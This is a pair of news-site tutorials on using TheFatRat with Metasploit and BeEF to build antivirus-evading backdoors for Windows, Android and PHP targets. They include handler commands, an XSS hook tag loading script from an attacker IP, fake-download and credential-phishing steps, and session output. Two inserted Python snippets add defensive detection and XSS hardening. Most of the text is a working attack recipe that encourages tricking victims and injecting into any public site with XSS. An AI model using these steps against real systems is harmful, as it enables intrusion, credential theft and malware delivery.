Hack Windows, Android, Mac using TheFatRat (Step by Step tutorial)
Information Security Newspaper | Hacking News
https://www.securitynewspaper.com/2019/01/31/hack-windows-android-mac-using-thefatrat-step-by-step-tutorial/
Thu, 31 Jan 2019 05:01:21 +0000

Using Metasploit is no longer difficult, because many resources available on the internet explain how to use it. Metasploit is one of the common ways of attacking an outdated operating system, and there are still many operating systems that can be exploited remotely. There are also many antivirus products that cannot detect these exploits, say ethical hacking professionals. This article looks at TheFatRat.

An ethical hacking researcher of the International Institute of Cyber Security did a detailed analysis of the working of TheFatRat to check the insides of this pentesting tool.

TheFatRat is another Metasploit-like tool that is used to generate backdoors easily. It compiles malware with some popular payloads, which can then be used to attack operating systems such as Windows, Mac and Linux. The tool offers many options, such as creating backdoors and infected DLLs, as per the ethical hacking investigation.

The whole tool has been tested on Parrot OS. After the backdoors were created, they were opened on Windows 10 Build 1607 and Android.

  • For cloning, type git clone https://github.com/Screetsec/TheFatRat.git
  • Then type cd TheFatRat
  • Type chmod u+x setup.sh
  • Type ./setup.sh
  • If mono does not install, type sudo apt-get update and sudo apt-get install mono-mcs, or type sudo apt-get install mono-devel, or type sudo apt-get install mono-complete
  • Some of the mono-related dependencies do not install directly, so simply run the above commands.
  • During installation it will ask whether to create a shortcut in Parrot OS. Simply type y. After installation you can run fatrat just as you run msfconsole.
  • Then type fatrat
  • As you can see, TheFatRat gives many options for creating a session on a target Windows machine or other platforms.

Creating A Simple Exploit To Hack Windows 10 :-

  • Type 6, which will create a FUD backdoor using pwnwinds.
  • Then type the option that creates a FUD backdoor using C# + PowerShell.
  • Enter the LHOST (listener/attacker IP address). Type 192.168.1.12
  • Type port 4444 or any port number.
  • Enter the backdoor file name tstfile
  • Type 3 to use windows/meterpreter/reverse_tcp.
  • Press enter to create the backdoor.
  • After the backdoor is created, it is saved in /home/user/Downloads/TheFatRat/output/tstfile.exe
  • To access the backdoor, go to the above location.
  • Open another terminal and start msfconsole. Msfconsole will be used to handle the ongoing session.
  • Type msfconsole
  • After msfconsole has started, type use exploit/multi/handler
  • Then type set payload windows/meterpreter/reverse_tcp
  • Type set LHOST 192.168.1.12
  • Type set LPORT 4444
  • Type exploit
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.1.12
LHOST => 192.168.1.12
msf5 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf5 exploit(multi/handler) > exploit
  • To open the backdoor in Windows 10, simply copy it from here to a pendrive and open the pendrive in Windows 10. You can also use any social engineering technique (such as Fake any website in seconds) to pass this exe to the TARGET computer.
  • You have to copy two files, tstfile.exe and program.cs, as this backdoor was created using C#.
  • Then double-click on tstfile.exe
  • When the target clicks on the file, a popup appears and a meterpreter session is opened.
  • As shown below, the meterpreter session has started in msfconsole.
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.1.12:4444
[*] Sending stage (179779 bytes) to 192.168.1.5
[*] Meterpreter session 1 opened (192.168.1.12:4444 -> 192.168.1.5:61050) at 2019-01-30 12:24:04 +0000
meterpreter > sysinfo
Computer : DESKTOP-2304ULE
OS : Windows 10 (Build 16299).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter >
  • The above target is using Windows 10. Once the session has been created, the attacker can perform various tasks.

Creating Backdoor easily with another option (with C code):-

  • Type 6
  • Type 6
  • Type 6
  • Enter the LHOST (listener/attacker IP address). Type 192.168.1.12
  • Type port 4444 or any port number.
  • Enter the backdoor file name tstfile
  • Press enter to create the backdoor.
  • Open another terminal and start msfconsole. Msfconsole will be used to handle the ongoing session.
  • Type msfconsole
  • After msfconsole has started, type use exploit/multi/handler
  • Then type set payload windows/meterpreter/reverse_tcp
  • Type set LHOST 192.168.1.12
  • Type set LPORT 4444
  • Type exploit
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.1.12
LHOST => 192.168.1.12
msf5 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf5 exploit(multi/handler) > exploit
  • When the target opens the malicious file (tstfile.exe) in Windows 10, a meterpreter session will start.
[*] Started reverse TCP handler on 192.168.1.12:4444
[*] Sending stage (179779 bytes) to 192.168.1.5
[*] Meterpreter session 2 opened (192.168.1.12:4444 -> 192.168.1.5:61331) at 2019-01-30 15:19:28 +0000
meterpreter >
  • As you can see, a meterpreter session has started on the attacker machine. The attacker can now easily manipulate the target.

Creating Backdoor Using Apache + Powershell :-

  • Type 6
  • Type 3

  • Enter the LHOST (listener/attacker IP address). Type 192.168.1.12
  • Type port 4444 or any port number.
  • Enter the backdoor file name tstfile1
  • Type 3
  • Press enter to create the backdoor.
  • Open the backdoor created above in Windows 10, or trick your target into opening the file on their PC.
  • Open another terminal and start msfconsole. Msfconsole will be used to handle the ongoing session.
  • Type msfconsole
  • After msfconsole has started, type use exploit/multi/handler
  • Then type set payload windows/meterpreter/reverse_tcp
  • Type set LHOST 192.168.1.12
  • Type set LPORT 4444
  • Type exploit
  • When the target opens the backdoor (tstfile1.exe), a new session will be created in Windows
[*] Sending stage (179779 bytes) to 192.168.1.5
[*] Meterpreter session 3 opened (192.168.1.12:4444 -> 192.168.1.5:61336) at 2019-01-30 15:20:01 +0000
meterpreter >

The differences between the backdoors are as follows. The first backdoor uses C# + PowerShell, and you have to copy files to the target. For the second backdoor you simply choose the options to create it, whereas the other backdoors require you to set a payload. The third backdoor uses an Apache web server. The third makes a strong backdoor for attackers: its session does not expire easily, while the sessions of the first two expired suddenly during testing, according to ethical hacking courses.

Inject Using PHP:-

  • Here we will create a backdoor using PHP. Type 1
  • Then type 5
  • Type LHOST 192.168.1.7
  • Then type port 80
  • Enter the file name tstfile
  • As shown in the above image, this backdoor uses a Windows payload to create a session.
  • After the payload has been created, move it to the Apache server location, as this payload will be opened using the IP address.
  • Type cp tstfile.php /var/www/html
  • Then type sudo service apache2 start
  • Then go to the target's Windows browser and type 192.168.1.7/tstfile.php
  • When the target opens the above URL, a PHP script starts in the background and a session starts as shown below.

[*] Meterpreter session 1 opened (192.168.1.12:80 -> 192.168.1.5:61331) at 2019-01-30 17:45:28 +0000
Id Information Connection
------ ------------ -----------
1 meterpreter php/linux www-data (33) @apache2 192.168.1.7:80 -> 192.178.1.5:61331

msf exploit(handler) > session -i 1
meterpreter > sysinfo
Computer : DESKTOP-2304ULE
OS : Windows 10 (Build 16299).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter >
  • After opening just a URL, the target can easily get hacked.

Attacking An Android Device :-

  • Type 1
  • Type 192.168.1.7
  • Type 4444
  • Then type backdoor
  • Type 3
  • Press enter to create the backdoor.
  • This creates an infected .apk file
  • We will open the backdoor on an Android mobile. Here we have used Android 4.4 Lollipop.
  • Create a multi handler inside msfconsole.
  • Type use exploit/multi/handler
  • Type set payload android/meterpreter/reverse_tcp
  • Type set LHOST 192.168.1.7
  • Type set LPORT 4444
  • Type exploit
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.1.7
LHOST => 192.168.1.7
msf5 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf5 exploit(multi/handler) > exploit
  • Install the above backdoor.apk
  • When backdoor.apk is opened on Android, a new session is created in msfconsole. As per a digital forensic expert from the International Institute of Cyber Security, users should be cautious while downloading any new Android app, as it can be an Android trojan.
[*] Started reverse TCP handler on 192.168.1.7:4444
[*] Sending stage (70554 bytes) to 192.168.1.12
[*] Meterpreter session 1 opened (192.168.1.7:4444 -> 192.168.1.12:58445) at 2019-01-31 02:04:20 +0000
meterpreter > help
Core Commands
Command                    Description
-------                    -----------
?                          Help menu
background                 Backgrounds the current session
bg                         Alias for background
bgkill                     Kills a background meterpreter script
bglist                     Lists running background scripts
bgrun                      Executes a meterpreter script as a background thread
channel                    Displays information or control active channels
close                      Closes a channel
disable_unicode_encoding   Disables encoding of unicode strings
enable_unicode_encoding    Enables encoding of unicode strings
exit                       Terminate the meterpreter session
get_timeouts               Get the current session timeout values
guid                       Get the session GUID
help                       Help menu
info                       Displays information about a Post module
irb                        Open an interactive Ruby shell on the current session
load                       Load one or more meterpreter extensions
machine_id                 Get the MSF ID of the machine attached to the session
pry                        Open the Pry debugger on the current session
quit                       Terminate the meterpreter session
read                       Reads data from a channel
resource                   Run the commands stored in a file
run                        Executes a meterpreter script or Post module
sessions                   Quickly switch to another session
set_timeouts               Set the current session timeout values
sleep                      Force Meterpreter to go quiet, then re-establish session.
transport                  Change the current transport mechanism
use                        Deprecated alias for "load"
uuid                       Get the UUID for the current session
write                      Writes data to a channel
  • Type sysinfo
meterpreter > sysinfo
Computer : localhost
OS : Android 4.4.2 - Linux 3.10.52-android-x86+ (i686)
Meterpreter : dalvik/android
meterpreter >
  • The attacker can now take advantage of the target Android device.
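
From the defender's side, the handler output in the sections above shows what these sessions look like on the network: the target connects out to a peer on the listener port and immediately receives a stage of 179779 bytes (Windows) or 70554 bytes (Android). The sketch below is an added example, not part of the original tutorial or of TheFatRat, that scores flow records on those traits; the CSV layout, the sample rows, KNOWN_SERVERS, EXPECTED_PORTS and the byte threshold are assumptions for illustration.

```python
import csv
import io
import ipaddress

# Constructed flow records (not from the article). Rows 1 and 4 mirror the
# sessions in the handler output above; the other rows are ordinary traffic
# plus one listener moved to port 443.
SAMPLE_FLOWS = """\
ts,orig_h,orig_p,resp_h,resp_p,service,orig_bytes,resp_bytes
2019-01-30T12:24:04,192.168.1.5,61050,192.168.1.12,4444,-,1320,181004
2019-01-30T12:25:10,192.168.1.5,61072,192.168.1.20,443,ssl,2210,48112
2019-01-30T12:26:31,192.168.1.5,61090,192.168.1.20,80,http,640,250331
2019-01-31T02:04:20,192.168.1.12,58445,192.168.1.7,4444,-,902,71880
2019-01-31T02:10:00,192.168.1.9,50211,192.168.1.30,443,-,512,176500
2019-01-31T02:11:00,192.168.1.9,50230,192.168.1.20,445,smb,90000,4100
"""

KNOWN_SERVERS = {"192.168.1.20"}     # assumption: inventory of real servers
EXPECTED_PORTS = {53, 80, 443, 445}  # assumption: ports workstations normally use
STAGE_MIN_BYTES = 50_000             # assumption: below both stage sizes shown above


def flow_reasons(row):
    """Return the independent signals that a single flow record raises."""
    reasons = []
    peer = ipaddress.ip_address(row["resp_h"])
    if peer.is_private and row["resp_h"] not in KNOWN_SERVERS:
        reasons.append("internal peer that is not a known server")
    if row["service"] == "-":
        reasons.append("no application protocol identified")
    if int(row["resp_p"]) not in EXPECTED_PORTS:
        reasons.append("unexpected destination port")
    sent, received = int(row["orig_bytes"]), int(row["resp_bytes"])
    if received >= STAGE_MIN_BYTES and received >= 10 * sent:
        reasons.append("large one-sided download from the peer")
    return reasons


def find_suspect_flows(text, threshold=3):
    """Parse CSV flow records and return (orig_h, resp_h, resp_p, reasons)
    for every flow that raises at least `threshold` signals."""
    hits = []
    for row in csv.DictReader(io.StringIO(text)):
        reasons = flow_reasons(row)
        if len(reasons) >= threshold:
            hits.append((row["orig_h"], row["resp_h"], int(row["resp_p"]), reasons))
    return hits


if __name__ == "__main__":
    for orig, resp, port, reasons in find_suspect_flows(SAMPLE_FLOWS):
        print(f"{orig} -> {resp}:{port}: " + "; ".join(reasons))
```

Because the port is only one signal among four, the constructed row on port 443 is still flagged, which matters since the tutorial notes that any port number can be chosen for the listener.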

How to hack computer using THEFATRAT and BEEF?
https://www.securitynewspaper.com/2018/02/15/hack-computer-using-thefatrat-beef/
Thu, 15 Feb 2018 05:04:11 +0000

This note will explore the life cycle of an attack, how a victim may be infected and what an attacker could do to avoid detection by antivirus systems (AV).

General description of the laboratory

According to the cyber security professional, the first step is to exploit a victim’s web browser using a tool called the Browser Exploitation Framework, or BeEF. It is a penetration testing tool that focuses on the web browser, and can be found at:

https://beefproject.com/

Step 1:

This step uses a cross-site scripting vulnerability on a web server to attack the victim. The information security specialist said that the goal is to get a victim to browse a site and to compromise their machine using BeEF. In this lab, the web server of the Damn Vulnerable Web Application (DVWA) was used. You could also insert your code into any public-facing web site or web application that has cross-site scripting (XSS) vulnerabilities.

Step 2:

In the second part, TheFatRat is used to create and package a client attack script. The TheFatRat attack script is a batch file that the victim will eventually be made to run on his own computer. PowerShell will be used to do this, and we hope to avoid AV detection.

Step 3:

In the third step, the TheFatRat infection is completed by using BeEF to socially engineer the user into executing the TheFatRat attack batch file. When this is done, a reverse Meterpreter shell is returned to the client.

Vulnerable web server:

In this test, DVWA was used as our web server, since it has been built with XSS vulnerabilities that we can exploit. The cyber security researcher comments that it is possible to use any website or web server that has an XSS vulnerability. One could also trick the victim into going directly to BeEF’s ‘hooked’ website. The DVWA v1.0.7 LiveCD ISO image is used for this project and can be downloaded at:

https://www.dvwa.co.uk/DVWA-1.0.7.is

Lab Systems:

The test is performed with the following systems:

Attacker: Kali Linux, 192.168.99.130

Web Server with XSS vulnerability: DVWA, 192.168.99.129

Victim: Windows 10 (fully patched with Microsoft Defender), 192.168.99.131

Open BeEF

Using the Kali Linux machine, the information security expert navigates to Applications / Social Engineering / Beef XSS Framework, and BeEF is started. The BeEF console looks like the following screenshot:

Note the URL of the hook’s webpage. BeEF should show this:

Now 127.0.0.1:3000 is changed to the IP address of the attacker. It looks like this:

<script src="https://192.168.99.130:3000/hook.js"></script>

The correct syntax is noted and copied into a text editor for future use. This window is kept open for the rest of the test. The cyber security expert said that the BeEF administration console should open automatically in the Kali Linux web browser after BeEF starts. If this does not happen, go to the URL:

https://127.0.0.1:3000/ui/authentication

The username and password for BeEF are beef / beef

Configure DVWA

At this point, open the web browser, go to the DVWA server (the IP address is 192.168.99.129) and log in. The user name and password for DVWA are admin / password.

When using DVWA, the security level is changed to low to expose the XSS vulnerabilities. This is done from the Kali Linux attack box. Open a web browser and select DVWA Security. Change the security level to low and press send. Note that the security level shown at the bottom of the web browser has changed to low.

The next thing to do is select the XSS tab, and in the Kali web browser navigate to Tools / Web Developer / Inspector as shown below:

The inspector box of the web page will open. The information security professional clicks inside the name field on the web page, and the inspector box moves to the web source code that corresponds to that section of the page. The maximum length is set to 10. Simply change this number to 100.

Now write the XSS script command in the name field:

<script src="https://192.168.99.130:3000/hook.js"></script>

Something must be entered in the message field; its content does not matter. Open another browser tab and go to the BeEF administration console, which is located at:

https://127.0.0.1:3000/ui/authentication

The cyber security expert makes sure that the BeEF terminal window is still open. Again, the username and password are beef. Then, from the victim’s machine (IP address 192.168.99.131), go to the web server (DVWA, IP address 192.168.99.129). Log in again with the username and password admin / password. Click on the XSS tab. You can see in the screenshot that the victim received a message.
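
The steps above work because the 10-character limit lives only in the browser's maxlength attribute, the stored name is written back into the page as markup, and nothing restricts where scripts may load from. The following is an added example (not DVWA's code and not from the original article) of the three server-side controls that break this chain; PAGE_URL, the same-origin script URL, the policy string and the simplified script-src matcher are assumptions for illustration.

```python
import html
from urllib.parse import urlsplit

MAX_NAME_LEN = 10  # the limit the form advertises, now enforced on the server
# The tag the article submits in the name field (taken from the text above).
HOOK_TAG = '<script src="https://192.168.99.130:3000/hook.js"></script>'
# Assumptions for illustration: the page path and the policy are constructed.
PAGE_URL = "http://192.168.99.129/guestbook"
POLICY = "default-src 'self'; script-src 'self'; object-src 'none'"


def validate_name(raw):
    """Reject over-long input server-side; maxlength in the browser is only a hint."""
    name = raw.strip()
    if not name or len(name) > MAX_NAME_LEN:
        raise ValueError(f"name must be 1-{MAX_NAME_LEN} characters")
    return name


def render_entry(name, message):
    """Encode on output so stored text is displayed as text, never parsed as markup."""
    safe_name = html.escape(name, quote=True)
    safe_message = html.escape(message, quote=True)
    return f"<div>Name: {safe_name}<br>Message: {safe_message}</div>"


def _origin(url):
    """Return (scheme, host, port) with default ports filled in."""
    parts = urlsplit(url)
    port = parts.port or {"http": 80, "https": 443}.get(parts.scheme)
    return (parts.scheme, parts.hostname, port)


def csp_allows_script(policy, page_url, script_url):
    """Simplified script-src check: understands 'self' and explicit
    scheme://host[:port] sources only (no wildcards, nonces or hashes)."""
    directives = {}
    for part in policy.split(";"):
        tokens = part.split()
        if tokens:
            directives[tokens[0].lower()] = tokens[1:]
    sources = directives.get("script-src", directives.get("default-src"))
    if sources is None:
        return True  # no directive covers scripts, so the browser loads anything
    for src in sources:
        if src == "'self'" and _origin(script_url) == _origin(page_url):
            return True
        if "://" in src and _origin(src) == _origin(script_url):
            return True
    return False


if __name__ == "__main__":
    print(render_entry(HOOK_TAG, "hello"))
    hook_url = "https://192.168.99.130:3000/hook.js"
    print("hook allowed by policy:", csp_allows_script(POLICY, PAGE_URL, hook_url))
```

Each control is independent: length validation rejects the tag outright, output encoding neutralises it if it is stored anyway, and a policy sent in the Content-Security-Policy response header stops the browser from fetching a script from the other host.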

The expert now returns to the Kali Linux machine and sees that the victim has been ‘hooked’ to BeEF. BeEF can perform a variety of social engineering attacks. Click on the hooked browser, and then click on the command tab. From there, move on to Social Engineering. The information security researcher selects the pretty theft attack. When you select that attack, you can see how the user can be socially engineered into revealing their Facebook ID. When the user enters their credentials, they are copied into your log.

Configuring TheFatRAT

The next step uses PowerShell to distribute TheFatRat and evade AV detection. TheFatRat must be installed. Go to the TheFatRat directory in a new tab. On reaching the main menu of TheFatRat, select option 6 – Create a bat + Powershell file (100% FUD).

Now you have to answer a list of questions:

LHOST: This is the IP address of the attack machine (Kali Linux).

LPORT: This is the port the victim will use for an outbound connection.

Output file: This is going to be the file the victim needs to run. Name it something unsuspicious so the victim will run it, such as update.

Type of Payload: Select Windows Reverse TCP Meterpreter

Leave the window open, minimize it, and open a new window.

Configuring the Metasploit Listener

Now the information security professional starts a Metasploit listener. Type msfconsole in a new terminal. When Metasploit has loaded, type the following commands, remembering to set the IP address and port as they were configured when the attack batch file was created in TheFatRat.

msf> use multi/handler

msf exploit(multi/handler)> set PAYLOAD windows/meterpreter/reverse_tcp

msf exploit(multi/handler)> set LHOST 192.168.99.130

msf exploit(multi/handler)> set LPORT 443

Type exploit -j

Start the Apache web server, copy the attack script

In a new window, the cyber security expert starts the web server by typing ‘service apache2 start’. Then the file created with TheFatRat is copied into the web server directory of the attack box, /var/www/html, with the cp command.

At this point the cyber security specialist is ready to exploit the victim by tricking her into executing the attack script created with TheFatRat. Now go back to the BeEF administration page and check whether the victim is still hooked. If not, you must reconnect them. When they are hooked, navigate to Social Engineering / Fake Notification Bar (Chrome).

Now change the notification URL from the default value (0.0.0.0:3000/dropper.exe) to the IP address of your attack machine and the name of the created attack script. Keep in mind that the web server is enabled on the attack box and the attack script (he called it lab2) has been copied to the web root directory. The configuration reflects that.

Now the user is prompted by your social engineering attack through their web browser, as shown below.

The user is prompted to run the file.

When the user runs the attack script, the information security researcher will have a reverse session on his Metasploit terminal window with a created session as shown below.
